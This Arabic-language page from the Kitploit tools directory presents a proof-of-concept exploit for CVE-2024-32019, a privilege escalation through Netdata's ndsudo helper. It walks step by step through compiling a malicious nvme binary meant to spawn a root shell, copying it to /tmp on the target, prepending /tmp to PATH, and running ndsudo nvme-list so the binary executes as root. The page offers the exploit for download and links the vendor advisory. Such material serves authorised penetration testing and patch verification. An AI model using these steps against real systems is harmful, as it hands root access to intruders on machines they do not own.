Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-32019-POC — برهان المفهوم لثغرة ndsudo في netdata - CVE-2024-32019 | Kitploit
أدوات/GitHubGitHub/azureadtrent/cve-2024-32019-poc
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقاستغلال الملفات الثنائية
GitHubazureadtrent/cve-2024-32019-poc

CVE-2024-32019-POC

برهان المفهوم لثغرة ndsudo في netdata - CVE-2024-32019

عرض المستودع
212منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تصعيد الامتيازات عبر ndsudo (استغلال محلي لـ Netdata)

يُستخدم هذا الإثبات المفاهيمي لاستغلال الأداة المساعدة الضعيفة ndsudo المرفقة مع Netdata لتصعيد الامتيازات المحلية إلى صلاحيات الجذر. يعمل الاستغلال عن طريق حقن ملف ثنائي ضار في PATH الخاص بالمستخدم يتقمص أمرًا موثوقًا (nvme) ويتم تنفيذه بصلاحيات الجذر بواسطة ndsudo.


المتطلبات والافتراضات

  • لديك وصول شل محلي على النظام المستهدف.

  • يمكنك تنفيذ الأمر التالي لكنه يفشل مع خطأ "غير موجود" أو خطأ مشابه:

    root@kitploit:~
    ./ndsudo nvme-list
    

1. تجميع الحمولة الضارة

على جهاز المهاجم (أو النظام الضعيف إذا كان لديه مترجم)، قم بتجميع الملف الثنائي (على سبيل المثال، من الملف poc.c في المستودع):

root@kitploit:~
gcc poc.c -o nvme

يجب تصميم هذا الملف الثنائي لفتح شل جذر أو تنفيذ أوامر عشوائية بصلاحيات الجذر.


2. نقل الحمولة إلى النظام المستهدف

انقل أو ارفع الملف الثنائي المجمع nvme إلى دليل قابل للكتابة بواسطة المستخدم الخاص بك، مثل /tmp:

root@kitploit:~
scp nvme user@target:/tmp/
# أو استخدم أي طريقة رفع ملفات متوفرة لديك

3. تحضير الحمولة للتنفيذ

على النظام المستهدف، تأكد من أن الملف الثنائي قابل للتنفيذ وأضف دليله إلى PATH الخاص بك:

root@kitploit:~
chmod +x /tmp/nvme
export PATH=/tmp:$PATH

يضمن ذلك أن ndsudo سيحل ويقوم بتنفيذ ملف nvme الضار الخاص بك بدلاً من الملف الشرعي.


4. تشغيل ndsudo لتنفيذ الحمولة

قم بتشغيل الأمر الضعيف لتشغيل ndsudo:

root@kitploit:~
./ndsudo nvme-list

الموارد

  • إعلان أمان Netdata على GitHub: https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93
تنزيل الأداة